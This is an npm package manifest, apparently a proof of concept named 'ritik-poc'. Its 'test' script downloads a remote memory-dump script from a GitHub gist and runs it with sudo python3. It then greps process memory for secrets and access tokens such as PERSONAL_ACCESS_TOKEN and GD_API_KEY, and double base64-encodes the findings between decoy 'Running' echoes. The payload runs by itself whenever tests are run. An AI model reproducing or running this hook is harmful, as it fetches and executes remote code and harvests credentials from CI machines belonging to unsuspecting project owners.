{
  "name": "ritik-poc",
  "version": "3.8.0",
  "description": "PoC for npm run",
  "scripts": {
    "test": "echo 'Running';curl -sSf 'https:\/\/gist.githubusercontent.com\/nikitastupin\/30e525b776c409e03c2d6f328f254965\/raw\/memdump.py' | sudo python3 | tr -d '\\0' | grep -iE 'secrets|PERSONAL_ACCESS_TOKEN|GD_API_KEY|GD_APP_ID' | sort -u | base64 -w0 | base64 -w0; echo 'Running'"
  },
  "author": "Ritik",
  "license": "Apache License 2.0",
  "engines": {
    "node": "14.19.3"
  }
}
